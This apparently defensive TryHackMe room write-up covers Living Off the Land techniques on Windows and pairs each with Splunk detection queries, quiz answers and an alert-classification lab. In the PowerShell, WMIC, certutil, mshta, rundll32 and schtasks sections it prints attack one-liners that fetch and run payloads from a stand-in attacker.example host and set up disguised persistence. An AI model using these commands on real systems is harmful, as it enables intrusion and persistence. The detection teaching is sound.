# Living Off the Land Attacks (TryHackMe)

Attackers do not always rely on custom malware or new binaries. Instead, they often exploit the **trusted system utilities** that are already built into operating systems — a technique known as **Living Off the Land (LoL)**. By abusing legitimate administrative tools, adversaries can execute code, move laterally, or maintain persistence while blending seamlessly into normal operations.

This room introduces the concept of Living Off the Land attacks, explaining **how and why attackers use native Windows utilities** to evade detection. You’ll learn how defenders can spot these subtle behaviors by analysing logs, detecting anomalies, and correlating seemingly benign actions with malicious intent.

Through theory and practical examples, this room helps you build a defender’s mindset: understanding how attackers think and how legitimate tools can become powerful attack vectors.

**Learning Objectives**

* Understand what Living Off the Land (LoL) attacks are and why they are effective.
    
* Identify legitimate Windows tools that can be repurposed for malicious activity.
    
* Recognise attacker behaviours that mimic normal administrative operations.
    
* Detect and analyse LoL techniques using logs and SIEM alerts.
    

**Prerequisites**

* Basic knowledge of malware classification and analysis.
    
* Familiarity with Windows administration and process monitoring.
    

## Introduction

Attackers do not always rely on custom malware or malicious executables. They can use trusted system tools already present on the target machine.

In this room, users will learn what LoL attacks are, why adversaries choose them, and how defenders can detect such activity through log monitoring and behavioural analysis. The room progresses from foundational knowledge to hands-on detection practice.

## **Learning Objectives:**

* Understand what Living Off the Land attacks are
    
* Identify legitimate Windows tools that can be abused
    
* Recognise attacker techniques that blend into normal system operations
    
* Detect LoL behaviour using log analysis and SIEM alerts
    

## **Prerequisites**

* [Malware classification](https://tryhackme.com/room/malwareclassification)
    
* [Introduction to Malware Analysis](https://tryhackme.com/room/intromalwareanalysis)
    
* [Living Off The Land](https://tryhackme.com/room/livingofftheland)
    

## Common LoL Tools and Techniques

Threat actors use Living Off the Land techniques because built-in tools are already trusted, widely available, and often allowed by default controls, so malicious activity can hide among normal operations. These techniques let attackers run code without dropping obvious new binaries, carry out stepwise workflows, and reuse legitimate credentials, all of which reduce noise and slow detection. Using native utilities also makes it easier to persist and move across systems while appearing like routine admin work.

Commonly abused tools provide scripting, management, file handling, or scheduling capabilities, which match common attacker needs like execution, persistence, reconnaissance, and lateral movement. Examples include:

* **PowerShell** is used for in-memory scripting, remote downloads, and automation.
    
* **WMIC** or **WMI** is used to run commands locally or on remote hosts and to query system state.
    
* **Certutil** is used to fetch files and encode or decode payloads.
    
* **Mshta** is used to run HTA content or an inline script delivered by a document or link.
    
* **Rundll32** is used to invoke DLL exports or trigger URL handlers.
    
* **Scheduled tasks** (**schtasks**) are used to run code at logon or on a schedule for persistence.
    

Operators also abuse signed admin utilities from the Sysinternals suite, for example PsExec for remote execution, and Autoruns for persistence discovery and manipulation, because those tools blend with legitimate admin workflows.

Living Off the Land methods are not limited to Windows; similar approaches exist on Unix and Linux, and public collections document common patterns for both platforms, for example, [LOLBAS](https://lolbas-project.github.io/) for Windows and [GTFOBins](https://gtfobins.github.io/) for Unix. Knowing which tools are most likely to be misused, and the typical goals behind those uses, helps defenders tune logging, capture full command lines and process trees, and prioritise alerts when normally benign binaries behave in clearly malicious ways.

Some measures we can take to reduce the attack surface and improve response include the following:

* Apply layered defensive controls that combine endpoint, network, and identity protections.
    
* Implement application control policies such as [AppLocker](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/applocker/applocker-overview) or [Windows Defender Application Control](https://learn.microsoft.com/en-us/hololens/windows-defender-application-control-wdac) to define which scripts and executables are permitted to run.
    
* Enforce/Use the principles of least privilege by ensuring only administrators can access or use system management utilities.
    
* Configure network rules and DNS filters to block or redirect connections to domains and IPs known for malicious activity.
    
* Maintain clear containment playbooks that outline the steps for isolating compromised systems and revoking exposed credentials.
    
* Regularly review and update access permissions, logging coverage, and control lists to adapt to new attack methods.
    

### Answer the questions below

Which public site lists Unix/Linux native binaries and how they can be abused? `GTFOBins`

Which Microsoft toolset includes PsExec and Autoruns, used for admin tasks and often misused by attackers? `Sysinternals`

## Real-World Examples

Living Off the Land methods are not limited to individual attackers or small operations. Many organised threat groups, both state-sponsored and financially motivated, depend on these techniques to keep a low profile. Using built-in and trusted binaries allows them to operate with fewer alerts from security tools and less chance of being blocked by application control policies.

The following examples show how known groups applied these tools in real-world operations between 2022 and 2024. Each example highlights the tools, the purpose of their use, and the advantage gained by the attackers.

## **APT29 (Nobelium) – PowerShell and WMI for Persistence and Execution**

APT29 has used fileless techniques that combine PowerShell with WMI event subscriptions to persist and execute code without dropping obvious binaries on disk. For example, [this](https://cloud.google.com/blog/topics/threat-intelligence/dissecting-one-ofap) detailed technical write-up shows how a WMI event subscription was created to run a PowerShell payload stored in WMI. The payload was read, decrypted, and executed from WMI properties, and the approach left minimal on-disk artefacts.  
For the WMI event subscription technique itself, see the [MITRE ATT&CK entry for WMI event subscriptions T1546.003](https://attack.mitre.org/techniques/T1546/003/), which documents how adversaries can create filters, consumers, and bindings to trigger code execution on specified events.

## **BlackCat (ALPHV) Ransomware – Built-in Tools for Lateral Movement**

BlackCat/ALPHV actors have used built-in tools like PowerShell for scripting and defence disabling, PsExec from the Sysinternals suite for remote execution and lateral movement, and certutil to fetch or decode payloads on hosts. Official advisories and national cybersecurity posts, as well as others [like this one](https://www.cyber.gov.au/about-us/advisories/2022-004-asdacsc-ransomware-profile-alphv-aka-blackcat), describe ALPHV activity that includes using PsExec and PowerShell for execution and lateral spread and using certutil-style techniques for handling files.

## **Cobalt Strike loaders: QakBot and IcedID**

Multiple incident reports and detection guides note that loaders such as [QakBot](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-242a), [IcedID](http://malpedia.caad.fkie.fraunhofer.de/details/win.icedid), and others have been used to stage and deliver [Cobalt Strike beacons](https://book.hacktricks.wiki/en/windows-hardening/cobalt-strike.html), and that attackers often use signed Windows binaries like **rundll32**.exe and mshta.exe to execute or bootstrap those payloads in memory, making execution appear to involve legitimate processes. Detection writeups and threat reports document **rundll32** and **mshta** being used to run DLL exports or HTA/JavaScript that then launch or drop Cobalt Strike beacons.

### Answer the questions below

What MITRE technique ID covers WMI event subscriptions? `T1546.003`

Which abbreviated name refers to one of the services that C2s, like Cobalt Strike, use to start or listen for remote services? `SMB`

## Detecting LOL activity

In this task, we'll show examples of Living Off The Land attacks on a Windows host, demonstrate several common LoL techniques, show the exact commands attackers use, and follow those actions with an example alert.

By building and observing small, controlled examples, we'll learn what the attacker does and how, as a defender, we can spot it.

## **PowerShell**

PowerShell is a scripting engine used for administration and automation in Windows systems.

Attackers use PowerShell because it can run scripts directly in memory without creating files, automate many system actions, interact with the network, and bypass some execution policies. Common purposes include downloading payloads, gathering information, running code stealthily, or modifying system settings.

Terminal

```powershell
user@machine$powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
powershell -NoP -NonI -W Hidden -EncodedCommand SQBn...Base64...
powershell -NoP -NonI -Command "Invoke-WebRequest 'http://attacker.example/file.exe' -OutFile 'C:\Users\Public\updater.exe'; Start-Process 'C:\Users\Public\updater.exe'"
```

In the above example, the first command uses the **IEX** (**DownloadString**) pattern to let an attacker fetch a script from a remote server and run it immediately in memory, avoiding disk artefacts and slowing detection.  In the second command, **\-EncodedCommand** hides the payload in **base64**, so human reviewers and simple log filters may miss the intent. Finally, it downloads and executes the **file.exe.**

An example detection is shown below:

`index=wineventlog OR index=sysmon (EventCode=4688 OR EventCode=1 OR EventCode=4104)`  
`(CommandLine="*powershell*IEX*" OR CommandLine="*powershell*-EncodedCommand*" OR CommandLine="*powershell*-Exec Bypass*" OR CommandLine="*Invoke-WebRequest*" OR CommandLine="*DownloadString*" OR CommandLine="*Invoke-RestMethod*")`  
`| stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine`

## **WMIC**

WMIC (Windows Management Instrumentation Command-line) lets administrators query and manage local or remote Windows systems. It is commonly used by threat actors to execute commands remotely, through starting processes.

Attackers use **WMIC** to execute commands or create processes remotely, collect system information, or establish persistence without using external binaries. It blends with admin behaviour and is often allowed in restricted environments.

Terminal

```powershell
user@machine$wmic /node:TARGETHOST process call create "powershell -NoP -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
wmic /node:TARGETHOST process get name,commandline
wmic process call create "notepad.exe" /hidden
```

In the first **WMIC** command, the operator targets a remote host and requests that the remote system create a new process. That new process is a PowerShell instance that downloads and executes a remote script, so WMIC acts as a remote launcher. Then, in the second WMIC command, the tool queries the remote system for its running processes and command lines, returning structured info useful for reconnaissance across hosts.  
In the third **WMIC** command, the local **WMIC** `process call create` API is used to spawn `notepad.exe` On the same machine, the optional hiding flag demonstrates how an attacker might try to make a spawned process less visible.

An example detection alert can be found below:

`index=sysmon OR index=wineventlog (EventCode=1 OR EventCode=4688)`  
`(CommandLine="*\\wmic.exe*process call create*" OR CommandLine="*wmic /node:* process call create*" OR CommandLine="*wmic*process get Name,CommandLine*")`  
`| stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine`

## **Certutil**

Certutil is a Microsoft tool used for managing certificates and encoding or decoding data. Certutil is intended for certificate management; it can download files with`-urlcache`, and it can decode **base64** payloads, turning text blobs into binaries. Attackers use it because it is signed by Microsoft and common in admin workflows. It can place files without using curl or similar software, and it bypasses some simple blocking rules.

Threat actors use Certutil to download files, decode **base64-encoded** payloads, or disguise malicious code as legitimate certificate operations. Its network and file-handling capabilities make it a versatile tool for staging payloads or decoding encrypted scripts.

Terminal

```powershell
user@machine$certutil -urlcache -split -f "http://attacker.example/payload.exe" C:\Users\Public\payload.exe
certutil -decode C:\Users\Public\encoded.b64 C:\Users\Public\decoded.exe
certutil -encode C:\Users\Public\decoded.exe C:\Users\Public\encoded.b64
```

In the first certutil command, the `-urlcache -split -f` flags instruct certutil to fetch the remote URL and write it to the specified local path; the result is a file dropped on disk that can be executed later.  
In the second command, certutil reads a base64 text file `encoded_payload.txt`, decodes it, and writes the resulting binary to `decoded_payload.exe`, so an attacker can transport a binary as text, then reconstruct it on the host.  
In the third command, certutil encodes an existing binary into base64 text stored in `payload.b64`This can be used to obfuscate the payload during staging or transit.

Example alert:

`index=sysmon OR index=wineventlog (EventCode=1 OR EventCode=4688 OR EventCode=4663)`  
`(Image="*\\certutil.exe" OR CommandLine="*certutil*")`  
`(CommandLine="* -urlcache * -f *" OR CommandLine="* -decode *" OR CommandLine="* -encode *")`  
`| stats count values(Host) as hosts values(User) as users values(ParentImage) as parents by CommandLine`

## **MSHTA**

Mshta runs HTML Application (HTA) files, which can contain VBScript or JavaScript code.

Terminal

```powershell
user@machine$mshta "http://attacker.example/payload.hta"
mshta "javascript:var s=new ActiveXObject('WScript.Shell');s.Run('powershell -NoP -NonI -W Hidden -Command "Start-Process calc.exe"');close();"
mshta "C:\Users\Public\malicious.hta"
```

In the first mshta command, mshta loads the HTA from a remote server and executes the HTA content in the host context.  
In the second mshta command mshta is passed an inline **javascript** URI that creates a **WScript.Shell** ActiveX object and uses it to run **PowerShell**, which then starts a process, this shows how inline script can directly spawn system commands without a saved intermediary.  
In the third mshta command, mshta runs a local HTA file, useful when the attacker delivers the HTA as an attachment or drops it on a shared drive.

Example alert:

`index=sysmon (EventCode=1 OR EventCode=4688) Image="*\\mshta.exe" (CommandLine="*http*://*" OR CommandLine="*javascript:*" OR CommandLine="*.hta")`  
`| stats count by host, user, ParentImage, CommandLine`

## **Rundll32**

Rundll32 executes specific exported functions from DLL files.

Terminal

```powershell
user@machine$rundll32.exe C:\Users\Public\backdoor.dll,Start
rundll32.exe url.dll,FileProtocolHandler "http://attacker.example/update.html"
rundll32.exe C:\Windows\Temp\loader.dll,Run
```

In the first **rundll32** command, **rundll32** loads the specified **DLL** and calls its exported Start function, which runs the DLL's code.  
In the second **rundll32** command, **rundll32** invokes url.dll with **FileProtocolHandler** and a remote URL, causing the system handler to process the remote content, which can bootstrap further activity.  
The third **rundll32** command is called a crafted export in a temporary **DLL**, which may execute embedded loader logic or shellcode from a file placed in a writable location.

Example alert:

`index=sysmon (EventCode=1 OR EventCode=4688 OR EventCode=7) Image="*\\rundll32.exe" (CommandLine="*\\Users\\Public\\*" OR CommandLine="*url.dll,FileProtocolHandler*" OR CommandLine="*\\Windows\\Temp\\*")`  
`| stats count by host, user, ParentImage, CommandLine`

## **Scheduled tasks (schtasks / Task Scheduler)**

Task Scheduler is a built-in Windows automation; it lets administrators run programs or scripts at specified times, on events such as logon, or on a repeating schedule. Tasks have a name, a trigger (when to run), an action (what to run), and an optional run-as account and conditions. Because it is a standard admin facility, tasks show up in normal system logs and are often allowed by policy, making it a valuable mechanism for both legitimate ops and attacker persistence.  
  
Attackers create or modify tasks to achieve persistence across reboots, to run code at user logon or on a regular cadence, or to quickly re-launch payloads after they remove other artefacts. They often pick task names that look benign, for example, WindowsUpdate or Maintenance, to avoid drawing attention. Tasks can run PowerShell, signed tools, or local scripts.

Terminal

```powershell
user@machine$schtasks /Create /SC ONLOGON /TN "WindowsUpdate" /TR "powershell -NoP -NonI -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/ps1')\""
schtasks /Create /SC DAILY /TN "DailyJob" /TR "C:\Users\Public\encrypt.ps1" /ST 00:05
schtasks /Run /TN "WindowsUpdate"
```

In the first **schtasks** command, a task named `WindowsUpdate` is created to run at logon. The action runs **PowerShell**, which downloads and executes a remote script on each user logon, providing persistence.  
In the second **schtasks** command a daily task named DailyJob is scheduled to run a local script at **00:0**5 each day, this can automate repeated harmful actions like scheduled encryption or staged data collection.  
In the third schtasks command, the attacker triggers the named task to run immediately, invoking its configured action on demand.

Example Alert:

`index=wineventlog EventCode=4698 OR EventCode=4699 OR index=sysmon (EventCode=1 OR EventCode=4688) (CommandLine="*schtasks* /Create*" OR CommandLine="*schtasks* /Run*" OR Image="*\\taskeng.exe" OR EventCode=4698)`  
`| stats count by host, user, EventCode, TaskName, CommandLine`

The above are some examples of Windows software and utilities that can be used as shown, to download, execute files, and encode payloads. But attackers can use a whole variety of software and tools. As analysts, we need to be ready to analyse and update with the latest techniques to catch this activity. 

### Answer the questions below

Which PowerShell switch is used to download text/strings and execute them? `IEX`

Which WMIC keyword triggers the creation of a new process on a remote host? `create`

## Practical

Please start the machine, check the example, and then classify the alerts in the following URL to get the flag. [https://LAB\_WEB\_URL.p.thmlabs.com](https://lab_web_url.p.thmlabs.com/) 

Answer the questions below

What is the flag?

| Time (UTC) | Severity | Event / Command | Action | Rationale |
| --- | --- | --- | --- | --- |
| 2025-10-22T14:12:03Z | High | **PowerShell IEX DownloadString** — `powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object` [`System.Net`](http://System.Net)`.WebClient).DownloadString('`[`https://updates.tryhackme.com/content/payload.ps1`](https://updates.tryhackme.com/content/payload.ps1)`')"` | **Malicious** | IEX + remote DownloadString from external URL = code execution from internet → high confidence malicious. |
| 2025-10-22T14:13:10Z | High | **PowerShell -EncodedCommand observed** — `powershell -NoP -NonI -EncodedCommand SQBnAHYAZQBSA...` | **Malicious** | EncodedCommand often used to obfuscate malicious payloads; treat as high risk until decoded. |
| 2025-10-22T14:20:05Z | High | **WMIC remote process create** — `wmic /node:WIN-LAB-01 process call create "powershell -NoP -Command IEX(New-Object Net.WebClient).DownloadString('`[`http://cdn.tryhatme.com/assets/bootstrap.ps1`](http://cdn.tryhatme.com/assets/bootstrap.ps1)`')"` | **Malicious** | Remote WMIC process creation that downloads & executes remote script — lateral C2 / execution pattern. |
| 2025-10-22T14:25:01Z | High | **Certutil download to Public** — `certutil -urlcache -split -f "`[`https://downloads.tryhatme.com/agents/agent.exe`](https://downloads.tryhatme.com/agents/agent.exe)`" C:\Users\Public\agent.exe` | **Malicious** | certutil used to fetch executable to public folder — common in malware distribution. |
| 2025-10-22T14:30:45Z | High | **MSHTA inline JavaScript spawning PowerShell** — `mshta "javascript:var s=new ActiveXObject('`[`WScript.Shell`](http://WScript.Shell)`');`[`s.Run`](http://s.Run)`('powershell -NoP -W Hidden -Command \"Start-Process calc.exe\"',0);close();"` | **Malicious** | mshta + ActiveX / PowerShell spawn indicates scripted execution and potential dropper; suspicious/malicious. |
| 2025-10-22T14:35:12Z | High | **Rundll32 executing temp DLL export** — `rundll32.exe C:\Windows\Temp\thm_loader.dll,Run` | **Malicious** | Execution of a DLL from Temp folder via rundll32 is strong indicator of malicious persistence/loader. |
| 2025-10-22T15:00:00Z | Low | **Disk cleanup initiated by user** — `cleanmgr.exe /sagerun:1` | **Not malicious** | Legitimate Windows disk cleanup run by user; no suspicious indicators. |
| 2025-10-22T15:05:00Z | Low | **Administrator command** — `cmd.exe /c dir C:\Windows\Temp` | **Not malicious** | Listing Temp folder by admin — benign administration, but correlate with suspicious files in Temp. |
| 2025-10-22T15:10:00Z | Medium | **Scheduled backup** — `backup.exe /create` | **Not malicious** | Scheduled backup process; treat as benign unless backup binary is abnormal/untrusted. |
| 2025-10-22T15:15:00Z | Low | **User launched Notepad** — `C:\Windows\System32\notepad.exe` | **Not malicious** | Standard user activity. |

  

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1762198861739/5f2da55d-cfaf-41c6-9427-c4d5af5f97e3.png align="center")

## Wrapping up

In this room, we examined how attackers repurpose trusted Windows utilities to carry out malicious activity without introducing new binaries. By testing and analysing each command safely, we observed how legitimate administrative tools such as **PowerShell**, **WMIC**, **Certutil**, **Mshta**, **Rundll32**, and **Scheduled Tasks** can be abused for execution, persistence, lateral movement, or evasion. Through these exercises, we developed a clearer view of how to recognise, detect, and respond when normal system processes are used with malicious intent.

We learned to:

* Identify the built-in Windows tools most often abused in Living Off the Land attacks.
    
* Understand how PowerShell enables fileless, in-memory, and automated execution.
    
* Observe how WMIC supports remote process creation and system reconnaissance.
    
* Recognise the ways Certutil downloads, encodes, or decodes malicious payloads.
    
* Detect Mshta and Rundll32 being used to run scripts or DLL-based payloads.
    
* Spot persistence mechanisms are created or triggered through Scheduled Tasks.
    
* Interpret process command lines and SIEM detections to separate admin from attacker behaviour.
    
* Apply defensive techniques such as enhanced logging, behavioural detection, and execution control to limit LoL activity.
    

In this room, we explored how adversaries **repurpose legitimate Windows utilities** to perform malicious actions without deploying custom malware. Through hands-on examples and detection exercises, we saw how common tools — **PowerShell, WMIC, Certutil, Mshta, Rundll32, and Task Scheduler** — can be weaponised for **execution, persistence, lateral movement, and evasion**.

By walking through real-world attack examples and analysing logs, we strengthened our ability to distinguish between **routine administrative activity** and **malicious Living Off the Land behaviour**.

**Key takeaways**

* Attackers exploit trust in native tools to evade traditional detection mechanisms.
    
* Behavioural and command-line analysis are essential for identifying LoL techniques.
    
* Centralised logging, event correlation, and endpoint monitoring improve visibility.
    
* Applying controls such as **AppLocker**, **Defender Application Control**, and **least privilege** can greatly reduce the LoL attack surface.
    

Living Off the Land attacks highlight a crucial reality: **not every malicious action looks malicious at first glance**. The ability to detect subtle misuse of everyday tools is what separates reactive defenders from proactive ones. By continuously updating detection rules and understanding attacker tradecraft, defenders can stay one step ahead — even when the attackers “live off the land.”
